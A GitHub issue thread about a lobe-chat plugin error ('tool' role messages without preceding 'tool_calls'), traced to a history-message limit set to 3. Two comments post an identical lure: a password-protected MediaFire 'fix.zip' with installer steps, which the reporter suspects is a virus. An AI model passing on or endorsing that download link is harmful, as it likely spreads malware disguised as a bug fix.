### ISSUE TITLE
[Bug] Invalid parameter: messages with role 'tool' must be a response to a preceeding message with 'tool_calls'.

### ISSUE THREAD

**Issue by ccoc-cc** [lobehub/lobe-chat#3613]
### 📦 部署环境

Vercel

### 📌 软件版本

1.12..19 数据库服务版

### 💻 系统环境

Windows

### 🌐 浏览器

Chrome

### 🐛 问题描述

Invalid parameter: messages with role 'tool' must be a response to a preceeding message with 'tool_calls'.

使用插件时提示这个, 测试插件是steam插件, api转发和azure的都提示这个.

```json
{
  "error": {
    "code": null,
    "type": "invalid_request_error",
    "param": "messages.[1].role",
    "message": "Invalid parameter: messages with role 'tool' must be a response to a preceeding message with 'tool_calls'. (request id: 2024082609283898414422218663168)"
  },
  "endpoint": "https://ai****ix.com/v1",
  "provider": "openai"
}
```

```json
{
  "error": {
    "message": "Invalid parameter: messages with role 'tool' must be a response to a preceeding message with 'tool_calls'."
  },
  "endpoint": "https://***.openai.azure.com/",
  "provider": "azure"
}
```

### 📷 复现步骤

安装插件, 使用插件

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ccoc-cc** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

秒评论, 且很多个地方都有,,,,,广告还是病毒????

**Comment by chung1912** [comment]
![image](https://github.com/user-attachments/assets/427bb19a-098f-4d31-8665-2b0cd238109e)你确认下是不是这个东西你关掉了？

**Comment by ccoc-cc** [comment]
> ![image](https://private-user-images.githubusercontent.com/38153111/361408049-427bb19a-098f-4d31-8665-2b0cd238109e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3MjAzMDUsIm5iZiI6MTcyNDcyMDAwNSwicGF0aCI6Ii8zODE1MzExMS8zNjE0MDgwNDktNDI3YmIxOWEtMDk4Zi00ZDMxLTg2NjUtMmIwY2QyMzgxMDllLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDAwNTMyNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTNkNzY5OTY1ZjUyMDg1MGExNzVkMzkyZGY4NzZmNTgxMDQwZDJjYmQ3NGUwNDZlOGRjZGE4OTg4MTU5YzNiNTgmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.4P_C5RY3TQc0TtLSDt_9mZGhBQcKb7gsJR512it40WA)你确认下是不是这个东西你关掉了？

确实被我关掉了,设置的3, 但另一个普通版的lobechat也被我关掉了设置的3,那个没有问题.

重新设置为不限制后能够成功调用了
